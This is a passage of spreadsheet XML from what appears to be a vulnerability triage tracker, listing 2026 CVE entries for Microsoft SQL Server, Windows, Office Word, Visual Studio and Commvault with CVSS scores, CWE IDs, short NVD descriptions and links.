          <t>CVE-2026-73018</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73023</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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7" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77105</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77106</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K213" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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18" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77504</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77901</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77906</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77907</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
